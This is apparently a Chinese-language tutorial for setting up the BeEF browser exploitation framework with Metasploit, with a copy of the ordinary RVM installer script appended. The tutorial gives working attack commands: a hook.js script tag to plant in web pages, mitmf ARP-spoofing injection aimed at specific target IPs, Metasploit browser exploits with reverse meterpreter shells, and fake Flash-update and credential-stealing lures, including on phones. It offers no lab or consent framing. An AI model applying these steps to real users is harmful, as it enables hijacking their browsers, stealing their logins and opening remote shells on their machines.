安装
Debian / Ubuntu
安装依赖
sudo apt-get update
sudo apt-get install curl git
curl -sSL https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash -s stable
source ~/.rvm/scripts/rvm
rvm install ruby-2.3.0
rvm use 2.3.0 --default
gem install bundle
安装beef
git clone git://github.com/beefproject/beef.git
cd beef
bundle install
ruby beef
也可以使用beef中给出的安装脚本自动安装,不过我安装的时候失败了。
基本配置使用
与metasploit联用
修改配置文件/usr/share/beef-xss/config.yaml
(1)改vi beef侦听端口: http: port:3000(比如改为80)
(2)与Metaspolit关联:
metasploit: enable: false(改为true)
like:ssl: false(改为true)
(3) 配置一下拓展下的metasploit配置文件
vim /usr/share/beef-xss/extensions/metasploit/config.yaml
下面的路径为本机metasploit的路径。
然后开启metasploit的相关服务开启:# service postgresql start
在命令行下用msfconsole把控制台打开
接着加载beEF,所用命令为:“load msgrpc ServerHost=127.0.0.1 Pass=abc123”
或者直接用这个命令启动:
msfconsole -x "load msgrpc ServerHost=127.0.0.1 Pass=abc123"
下面我们来启动beef
cd /usr/share/beef-xss/ && ./beef -x
为了方便,写个启动脚本
#!/bin/bash service postgresql start msfconsole -x "load msgrpc ServerHost=127.0.0.1 Pass=abc123" cd /usr/share/beef-xss && ./beef -x
接口控制面板可以通过http://192.168.1.104:3000/ui/panel来访问
默认username/passwd是 beef:beef
控制界面
默认hook js:http://192.168.1.104:3000/hook.js
默认hook页面: http://192.168.1.104:3000/demos/basic.html //访问即可被hook
好了,现在一切都已经准备好,让我们用php编写一个程序进行测试
vim /var/www/index.html
<html>
<head>
<script src="http://192.168.1.104:3000/hook.js"></script>
</head>
</html>
如果是内网,也可以利用欺骗劫持勾住目标浏览器,比如使用mitmf(要以管理员权限运行)
mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --hsts --inject --js-url http://192.168.1.104:3000/hook.js mitmf -i eth0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.129 --inject --html-url http://192.168.1.104:3000/demos/basic.html
钩住目标浏览器后,我们可以利用社会工程来使用户接受扩展。(Social Engineering中的模块)
比如:可以发送叫做:HTML5 Rendering Enhancements的扩展给用户,它会通过 1337 端口打开 shell。
还可以配合metasploit进一步获取权限。如:
use exploit/windows/browser/java_cmm set payload windows/meterpreter/reverse_tcp
生成url之后,注入目标浏览器中,进而在msf中获取shell
再比如这个模块
use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.1.104
set URIPATH /
我们我们可以看到每一个tab代表一个浏览器,它有5个tab-总结如下:
Details-显示被hook的浏览器的细节。如上图所示
Logs-显示当前浏览器的log实体。如下图所示
commands-我们可以对一个浏览器执行模块。模块可以执行可以通过JavaScript来执行的任何命令。每一个模块有一个图标,表示为如下色彩:
Green : 可以工作; user不可见
Orange :可以工作; user可见
Grey : 可能工作
Red : 不能工作
一些实用模块
Redirect Browser:进行重定向
方法:右侧填写木马的路径,可以配合插件升级攻击
Social Engineering --> Fake Flash Update
flash插件升级
Social Engineering --> Fake Notification Bar
功能类似插件升级
Social Engineering --> Clippy
Social Engineering --> Pretty Theft
窃取登陆凭证
Misc --> Create Invisible Frame
注入一个隐藏的iframe框架
Metasploit实用姿势
使用Metasploit的Browser Autopwn功能生成一个浏览器攻击链接
use auxiliary/server/browser_autopwn show options set LHOST xxx set SRVHOST xxx set SRVPORT xxxx
run -z
使用"Create Invisible Iframe"模块加载autopwn页面
hook手机
由于手机打开网址持续的时间很短,关闭当前页面后BeEF的shell就会下线,因此我们可以使用BeEF API,用户上线后能够自动执行批量命令,结合Persistence模块能够极大提高shell存活时间。除了与windows系统相关的信息无法获取,其他操作均能成功执行,并且BeEF为手机劫持提供了专门的模块系列——Phonegap
以下是经测试可以在Android上使用的模块:
1、弹框 2、重定向 3、查看是否访问过某些网站 4、Creates an invisible iframe 5、Social Engineering系列,如下图,仅作演示 6、msf系列 7、NetWork系列,可以用来扫描同一内网下的windows主机
附:https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer (代码如下)
#!/usr/bin/env bash shopt -s extglob set -o errtrace set -o errexit rvm_install_initialize() { DEFAULT_SOURCES=(github.com/rvm/rvm bitbucket.org/mpapis/rvm) BASH_MIN_VERSION="3.2.25" if [[ -n "${BASH_VERSION:-}" && "$(printf "%b" "${BASH_VERSION:-} ${BASH_MIN_VERSION} " | LC_ALL=C sort -t"." -k1,1n -k2,2n -k3,3n | head -n1)" != "${BASH_MIN_VERSION}" ]] then echo "BASH ${BASH_MIN_VERSION} required (you have $BASH_VERSION)" exit 1 fi export HOME PS4 export rvm_trace_flag rvm_debug_flag rvm_user_install_flag rvm_ignore_rvmrc rvm_prefix rvm_path PS4="+ ${BASH_SOURCE##${rvm_path:-}} : ${FUNCNAME[0]:+${FUNCNAME[0]}()} ${LINENO} > " } log() { printf "%b " "$*"; } debug(){ [[ ${rvm_debug_flag:-0} -eq 0 ]] || printf "%b " "Running($#): $*"; } fail() { log " ERROR: $* " ; exit 1 ; } rvm_install_commands_setup() { which which >/dev/null 2>&1 || fail "Could not find 'which' command, make sure it's available first before continuing installation." which grep >/dev/null 2>&1 || fail "Could not find 'grep' command, make sure it's available first before continuing installation." if [[ -z "${rvm_tar_command:-}" ]] && builtin command -v gtar >/dev/null then rvm_tar_command=gtar elif ${rvm_tar_command:-tar} --help 2>&1 | GREP_OPTIONS="" grep -- --strip-components >/dev/null then rvm_tar_command="${rvm_tar_command:-tar}" else case "$(uname)" in (OpenBSD) log "Trying to install GNU version of tar, might require sudo password" if (( UID )) then sudo pkg_add -z gtar-1 else pkg_add -z gtar-1 fi rvm_tar_command=gtar ;; (Darwin|FreeBSD|DragonFly) # it's not possible to autodetect on OSX, the help/man does not mention all flags rvm_tar_command=tar ;; (SunOS) case "$(uname -r)" in (5.10) log "Trying to install GNU version of tar, might require sudo password" if (( UID )) then if which sudo >/dev/null 2>&1 then sudo_10=sudo elif which /opt/csw/bin/sudo >/dev/null 2>&1 then sudo_10=/opt/csw/bin/sudo else fail "sudo is required but not found. You may install sudo from OpenCSW repository (https://www.opencsw.org/about)" fi pkginfo -q CSWpkgutil || $sudo_10 pkgadd -a $rvm_path/config/solaris/noask -d https://get.opencsw.org/now CSWpkgutil sudo /opt/csw/bin/pkgutil -iy CSWgtar -t https://mirror.opencsw.org/opencsw/unstable else pkginfo -q CSWpkgutil || pkgadd -a $rvm_path/config/solaris/noask -d https://get.opencsw.org/now CSWpkgutil /opt/csw/bin/pkgutil -iy CSWgtar -t https://mirror.opencsw.org/opencsw/unstable fi rvm_tar_command=/opt/csw/bin/gtar ;; (*) rvm_tar_command=tar ;; esac esac builtin command -v ${rvm_tar_command:-gtar} >/dev/null || fail "Could not find GNU compatible version of 'tar' command, make sure it's available first before continuing installation." fi if [[ " ${rvm_tar_options:-} " != *" --no-same-owner "* ]] && $rvm_tar_command --help 2>&1 | GREP_OPTIONS="" grep -- --no-same-owner >/dev/null then rvm_tar_options="${rvm_tar_options:-}${rvm_tar_options:+ }--no-same-owner" fi } usage() { printf "%b" " Usage rvm-installer [options] [action] Options [[--]version] <version> The version or tag to install. Valid values are: latest - The latest tagged version. latest-minor - The latest minor version of the current major version. latest-<x> - The latest minor version of version x. latest-<x>.<y> - The latest patch version of version x.y. <x>.<y>.<z> - Major version x, minor version y and patch z. [--]branch <branch> The name of the branch from which RVM is installed. This option can be used with the following formats for <branch>: <account>/ If account is wayneeseguin or mpapis, installs from one of the following: https://github.com/rvm/rvm/archive/master.tar.gz https://bitbucket.org/mpapis/rvm/get/master.tar.gz Otherwise, installs from: https://github.com/<account>/rvm/archive/master.tar.gz <account>/<branch> If account is wayneeseguin or mpapis, installs from one of the following: https://github.com/rvm/rvm/archive/<branch>.tar.gz https://bitbucket.org/mpapis/rvm/get/<branch>.tar.gz Otherwise, installs from: https://github.com/<account>/rvm/archive/<branch>.tar.gz [/]<branch> Installs the branch from one of the following: https://github.com/rvm/rvm/archive/<branch>.tar.gz https://bitbucket.org/mpapis/rvm/get/<branch>.tar.gz [--]source <source> Defines the repository from which RVM is retrieved and installed in the format: <domain>/<account>/<repo> Where: <domain> - Is bitbucket.org, github.com or a github enterprise site serving an RVM repository. <account> - Is the user account in which the RVM repository resides. <repo> - Is the name of the RVM repository. Note that when using the [--]source option, one should only use the [/]branch format with the [--]branch option. Failure to do so will result in undefined behavior. --trace Provides debug logging for the installation script. Actions master - Installs RVM from the master branch at rvm/rvm on github or mpapis/rvm on bitbucket.org. stable - Installs RVM from the stable branch a rvm/rvm on github or mpapis/rvm on bitbucket.org. help - Displays this output. " } ## duplication marker 32fosjfjsznkjneuera48jae __rvm_curl_output_control() { if (( ${rvm_quiet_curl_flag:-0} == 1 )) then __flags+=( "--silent" "--show-error" ) elif [[ " $*" == *" -s"* || " $*" == *" --silent"* ]] then # make sure --show-error is used with --silent [[ " $*" == *" -S"* || " $*" == *" -sS"* || " $*" == *" --show-error"* ]] || { __flags+=( "--show-error" ) } fi } ## duplication marker 32fosjfjsznkjneuera48jae # -S is automatically added to -s __rvm_curl() ( __rvm_which curl >/dev/null || { rvm_error "RVM requires 'curl'. Install 'curl' first and try again." return 200 } typeset -a __flags __flags=( --fail --location --max-redirs 10 ) [[ "$*" == *"--max-time"* ]] || [[ "$*" == *"--connect-timeout"* ]] || __flags+=( --connect-timeout 30 --retry-delay 2 --retry 3 ) if [[ -n "${rvm_proxy:-}" ]] then __flags+=( --proxy "${rvm_proxy:-}" ) fi __rvm_curl_output_control unset curl __rvm_debug_command curl "${__flags[@]}" "$@" || return $? ) rvm_error() { printf "ERROR: %b " "$*"; } __rvm_which(){ which "$@" || return $?; true; } __rvm_debug_command() { debug "Running($#): $*" "$@" || return $? true } rvm_is_a_shell_function() { [[ -t 0 && -t 1 ]] || return $? return ${rvm_is_not_a_shell_function:-0} } # Searches the tags for the highest available version matching a given pattern. # fetch_version (github.com/rvm/rvm bitbucket.org/mpapis/rvm) 1.10. -> 1.10.3 # fetch_version (github.com/rvm/rvm bitbucket.org/mpapis/rvm) 1.10. -> 1.10.3 # fetch_version (github.com/rvm/rvm bitbucket.org/mpapis/rvm) 1. -> 1.11.0 # fetch_version (github.com/rvm/rvm bitbucket.org/mpapis/rvm) "" -> 2.0.1 fetch_version() { typeset _account _domain _pattern _repo _sources _values _version _sources=(${!1}) _pattern=$2 for _source in "${_sources[@]}" do IFS='/' read -r _domain _account _repo <<< "${_source}" _version="$( fetch_versions ${_domain} ${_account} ${_repo} | GREP_OPTIONS="" grep "^${_pattern:-}" | tail -n 1 )" if [[ -n ${_version} ]] then echo "${_version}" return 0 fi done } # Returns a sorted list of all version tags from a repository fetch_versions() { typeset _account _domain _repo _url _domain=$1 _account=$2 _repo=$3 case ${_domain} in (bitbucket.org) _url=https://${_domain}/api/1.0/repositories/${_account}/${_repo}/branches-tags ;; (github.com) _url=https://api.${_domain}/repos/${_account}/${_repo}/tags ;; (*) _url=https://${_domain}/api/v3/repos/${_account}/${_repo}/tags ;; esac __rvm_curl -s ${_url} | awk -v RS=',' -v FS='"' '$2=="name"{print $4}' | sort -t. -k 1,1n -k 2,2n -k 3,3n -k 4,4n -k 5,5n } install_release() { typeset _source _sources _url _version _verify_pgp _sources=(${!1}) _version=$2 debug "Downloading RVM version ${_version}" for _source in "${_sources[@]}" do case ${_source} in (bitbucket.org*) _url="https://${_source}/get/${_version}.tar.gz" _verify_pgp="https://${_source}/downloads/${_version}.tar.gz.asc" ;; (*) _url="https://${_source}/archive/${_version}.tar.gz" _verify_pgp="https://${_source}/releases/download/${_version}/${_version}.tar.gz.asc" ;; esac get_and_unpack "${_url}" "rvm-${_version}.tgz" "$_verify_pgp" && return done return $? } install_head() { typeset _branch _source _sources _url _sources=(${!1}) _branch=$2 debug "Selected RVM branch ${_branch}" for _source in "${_sources[@]}" do case ${_source} in (bitbucket.org*) _url=https://${_source}/get/${_branch}.tar.gz ;; (*) _url=https://${_source}/archive/${_branch}.tar.gz ;; esac get_and_unpack "${_url}" "rvm-${_branch////_}.tgz" && return done return $? } # duplication marker dfkjdjngdfjngjcszncv # Drop in cd which _doesn't_ respect cdpath __rvm_cd() { typeset old_cdpath ret ret=0 old_cdpath="${CDPATH}" CDPATH="." chpwd_functions="" builtin cd "$@" || ret=$? CDPATH="${old_cdpath}" return $ret } get_package() { typeset _url _file _url="$1" _file="$2" log "Downloading ${_url}" __rvm_curl -sS ${_url} > ${rvm_archives_path}/${_file} || { _return=$? case $_return in # duplication marker lfdgzkngdkjvnfjknkjvcnbjkncvjxbn (60) log " Could not download '${_url}', you can read more about it here: https://rvm.io/support/fixing-broken-ssl-certificates/ To continue in insecure mode run 'echo insecure >> ~/.curlrc'. " ;; # duplication marker lfdgzkngdkjvnfjknkjvcnbjkncvjxbn (77) log " It looks like you have old certificates, you can read more about it here: https://rvm.io/support/fixing-broken-ssl-certificates/ " ;; # duplication marker lfdgzkngdkjvnfjknkjvcnbjkncvjxbn (141) log " Curl returned 141 - it is result of a segfault which means it's Curls fault. Try again and if it crashes more than a couple of times you either need to reinstall Curl or consult with your distribution manual and contact support. " ;; (*) log " Could not download '${_url}'. curl returned status '$_return'. " ;; esac return $_return } } # duplication marker flnglfdjkngjndkfjhsbdjgfghdsgfklgg rvm_install_gpg_setup() { export rvm_gpg_command { rvm_gpg_command="$( which gpg2 2>/dev/null )" && [[ ${rvm_gpg_command} != "/cygdrive/"* ]] } || rvm_gpg_command="" debug "Detected GPG program: '$rvm_gpg_command'" [[ -n "$rvm_gpg_command" ]] || return $? } # duplication marker rdjgndfnghdfnhgfdhbghdbfhgbfdhbn verify_package_pgp() { if "${rvm_gpg_command}" --verify "$2" "$1" then log "GPG verified '$1'" else typeset _ret=$? log " Warning, RVM 1.26.0 introduces signed releases and automated check of signatures when GPG software found. Assuming you trust Michal Papis import the mpapis public key (downloading the signatures). GPG signature verification failed for '$1' - '$3'! Try to install GPG v2 and then fetch the public key: ${SUDO_USER:+sudo }${rvm_gpg_command##*/} --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 or if it fails: command curl -sSL https://rvm.io/mpapis.asc | ${SUDO_USER:+sudo }${rvm_gpg_command##*/} --import - the key can be compared with: https://rvm.io/mpapis.asc https://keybase.io/mpapis NOTE: GPG version 2.1.17 have a bug which cause failures during fetching keys from remote server. Please downgrade or upgrade to newer version (if available) or use the second method described above. " exit $_ret fi } verify_pgp() { [[ -n "${1:-}" ]] || { debug "No PGP url given, skipping." return 0 } get_package "$1" "$2.asc" || { debug "PGP url given but does not exist: '$1'" return 0 } rvm_install_gpg_setup || { log "Found PGP signature at: '$1', but no GPG software exists to validate it, skipping." return 0 } verify_package_pgp "${rvm_archives_path}/$2" "${rvm_archives_path}/$2.asc" "$1" } get_and_unpack() { typeset _url _file _patern _return _verify_pgp _url="$1" _file="$2" _verify_pgp="$3" get_package "$_url" "$_file" || return $? verify_pgp "$_verify_pgp" "$_file" || return $? [[ -d "${rvm_src_path}/rvm" ]] || mkdir -p "${rvm_src_path}/rvm" __rvm_cd "${rvm_src_path}/rvm" || { _return=$? log "Could not change directory '${rvm_src_path}/rvm'." return $_return } rm -rf ${rvm_src_path}/rvm/* __rvm_debug_command $rvm_tar_command xzf ${rvm_archives_path}/${_file} ${rvm_tar_options:-} --strip-components 1 || { _return=$? log "Could not extract RVM sources." return $_return } } rvm_install_default_settings() { # Tracing, if asked for. if [[ "$*" == *--trace* ]] || (( ${rvm_trace_flag:-0} > 0 )) then set -o xtrace rvm_trace_flag=1 fi # Variable initialization, remove trailing slashes if they exist on HOME true ${rvm_trace_flag:=0} ${rvm_debug_flag:=0} ${rvm_ignore_rvmrc:=0} HOME="${HOME%%+(/)}" if (( rvm_ignore_rvmrc == 0 )) then for rvmrc in /etc/rvmrc "$HOME/.rvmrc" do if [[ -s "$rvmrc" ]] then if GREP_OPTIONS="" grep '^s*rvm .*$' "$rvmrc" >/dev/null 2>&1 then printf "%b" " Error: $rvmrc is for rvm settings only. rvm CLI may NOT be called from within $rvmrc. Skipping the loading of $rvmrc " exit 1 else source "$rvmrc" fi fi done fi if [[ -z "${rvm_path:-}" ]] then if (( UID == 0 )) then rvm_user_install_flag=0 rvm_prefix="/usr/local" rvm_path="${rvm_prefix}/rvm" else rvm_user_install_flag=1 rvm_prefix="$HOME" rvm_path="${rvm_prefix}/.rvm" fi fi if [[ -z "${rvm_prefix}" ]] then rvm_prefix=$( dirname $rvm_path ) fi # duplication marker kkdfkgnjfndgjkndfjkgnkfjdgn [[ -n "${rvm_user_install_flag:-}" ]] || case "$rvm_path" in (/usr/local/rvm) rvm_user_install_flag=0 ;; ($HOME/*|/${USER// /_}*) rvm_user_install_flag=1 ;; (*) rvm_user_install_flag=0 ;; esac } rvm_install_parse_params() { install_rubies=() install_gems=() flags=( ./scripts/install ) forwarded_flags=() while (( $# > 0 )) do token="$1" shift case "$token" in (--trace) set -o xtrace rvm_trace_flag=1 flags=( -x "${flags[@]}" "$token" ) forwarded_flags+=( "$token" ) ;; (--debug|--quiet-curl) flags+=( "$token" ) forwarded_flags+=( "$token" ) token=${token#--} token=${token//-/_} export "rvm_${token}_flag"=1 printf "%b" "Turning on ${token/_/ } mode. " ;; (--path) if [[ -n "${1:-}" ]] then rvm_path="$1" shift else fail "--path must be followed by a path." fi ;; (--branch|branch) # Install RVM from a given branch if [[ -n "${1:-}" ]] then case "$1" in (/*) branch=${1#/} ;; (*/) branch=master if [[ "${1%/}" -ne wayneeseguin ]] && [[ "${1%/}" -ne mpapis ]] then sources=(github.com/${1%/}/rvm) fi ;; (*/*) branch=${1#*/} if [[ "${1%%/*}" -ne wayneeseguin ]] && [[ "${1%%/*}" -ne mpapis ]] then sources=(github.com/${1%%/*}/rvm) fi ;; (*) branch="$1" ;; esac shift else fail "--branch must be followed by a branchname." fi ;; (--source|source) if [[ -n "${1:-}" ]] then if [[ "$1" = */*/* ]] then sources=($1) shift else fail "--source must be in the format <domain>/<account>/<repo>." fi else fail "--source must be followed by a source." fi ;; (--user-install|--ignore-dotfiles) token=${token#--} token=${token//-/_} export "rvm_${token}_flag"=1 printf "%b" "Turning on ${token/_/ } mode. " ;; (--auto-dotfiles) flags+=( "$token" ) export "rvm_auto_dotfiles_flag"=1 printf "%b" "Turning on auto dotfiles mode. " ;; (--auto) export "rvm_auto_dotfiles_flag"=1 printf "%b" "Warning, --auto is deprecated in favor of --auto-dotfiles. " ;; (--verify-downloads) if [[ -n "${1:-}" ]] then export rvm_verify_downloads_flag="$1" forwarded_flags+=( "$token" "$1" ) shift else fail "--verify-downloads must be followed by level(0|1|2)." fi ;; (--autolibs=*) flags+=( "$token" ) export rvm_autolibs_flag="${token#--autolibs=}" forwarded_flags+=( "$token" ) ;; (--without-gems=*|--with-gems=*|--with-default-gems=*) flags+=( "$token" ) value="${token#*=}" token="${token%%=*}" token="${token#--}" token="${token//-/_}" export "rvm_${token}"="${value}" printf "%b" "Installing RVM ${token/_/ }: ${value}. " ;; (--version|version) version="$1" shift ;; (head|master) version="head" branch="master" ;; (stable) version="latest" ;; (latest|latest-*|+([[:digit:]]).+([[:digit:]]).+([[:digit:]])) version="$token" ;; (--ruby) install_rubies+=( ruby ) ;; (--ruby=*) token=${token#--ruby=} install_rubies+=( ${token//,/ } ) ;; (--rails) install_gems+=( rails ) ;; (--gems=*) token=${token#--gems=} install_gems+=( ${token//,/ } ) ;; (--add-to-rvm-group) export rvm_add_users_to_rvm_group="$1" shift ;; (help|usage) usage exit 0 ;; (*) usage exit 1 ;; esac done if (( ${#install_gems[@]} > 0 && ${#install_rubies[@]} == 0 )) then install_rubies=( ruby ) fi true "${version:=head}" true "${branch:=master}" if [[ -z "${sources[@]}" ]] then sources=("${DEFAULT_SOURCES[@]}") fi rvm_src_path="$rvm_path/src" rvm_archives_path="$rvm_path/archives" rvm_releases_url="https://rvm.io/releases" } rvm_install_validate_rvm_path() { case "$rvm_path" in (*[[:space:]]*) printf "%b" " It looks you are one of the happy *space* users(in home dir name), RVM is not yet fully ready for it, use this trick to fix it: sudo mkdir -p /${USER// /_}.rvm sudo chown -R "$USER:" /${USER// /_}.rvm echo "export rvm_path=/${USER// /_}.rvm" >> "$HOME/.rvmrc" and start installing again. " exit 2 ;; (/usr/share/ruby-rvm) printf "%b" " It looks you are one of the happy Ubuntu users, RVM packaged by Ubuntu is old and broken, follow this link for details how to fix: https://stackoverflow.com/a/9056395/497756 " [[ "${rvm_uses_broken_ubuntu_path:-no}" == "yes" ]] || exit 3 ;; esac if [[ "$rvm_path" != "/"* ]] then fail "The rvm install path must be fully qualified. Tried $rvm_path" fi } rvm_install_select_and_get_version() { typeset _version_release for dir in "$rvm_src_path" "$rvm_archives_path" do [[ -d "$dir" ]] || mkdir -p "$dir" done _version_release="${version}" case "${version}" in (head) _version_release="${branch}" install_head sources[@] ${branch:-master} || exit $? ;; (latest) install_release sources[@] $(fetch_version sources[@]) || exit $? ;; (latest-minor) version="$(cat "$rvm_path/VERSION")" install_release sources[@] $(fetch_version sources[@] ${version%.*}) || exit $? ;; (latest-*) install_release sources[@] $(fetch_version sources[@] ${version#latest-}) || exit $? ;; (+([[:digit:]]).+([[:digit:]]).+([[:digit:]])) # x.y.z install_release sources[@] ${version} || exit $? ;; (*) fail "Something went wrong, unrecognized version '$version'" ;; esac echo "${_version_release}" > "$rvm_path/RELEASE" } rvm_install_main() { [[ -f ./scripts/install ]] || { log "'./scripts/install' can not be found for installation, something went wrong, it usally means your 'tar' is broken, please report it here: https://github.com/rvm/rvm/issues" return 127 } # required flag - path to install flags+=( --path "$rvm_path" ) command bash "${flags[@]}" } rvm_install_ruby_and_gems() ( if (( ${#install_rubies[@]} > 0 )) then source ${rvm_scripts_path:-${rvm_path}/scripts}/rvm source ${rvm_scripts_path:-${rvm_path}/scripts}/version __rvm_version for _ruby in ${install_rubies[@]} do command rvm "${forwarded_flags[@]}" install ${_ruby} -j 2 done # set the first one as default, skip rest for _ruby in ${install_rubies[@]} do rvm "${forwarded_flags[@]}" alias create default ${_ruby} break done for _gem in ${install_gems[@]} do rvm "${forwarded_flags[@]}" all do gem install ${_gem} done printf "%b" " * To start using RVM you need to run \`source $rvm_path/scripts/rvm\` in all your open shell windows, in rare cases you need to reopen all shell windows. " if [[ "${install_gems[*]}" == *"rails"* ]] then printf "%b" " * To start using rails you need to run \`rails new <project_dir>\`. " fi fi ) rvm_install() { rvm_install_initialize rvm_install_commands_setup rvm_install_default_settings rvm_install_parse_params "$@" rvm_install_validate_rvm_path rvm_install_select_and_get_version rvm_install_main rvm_install_ruby_and_gems } rvm_install "$@"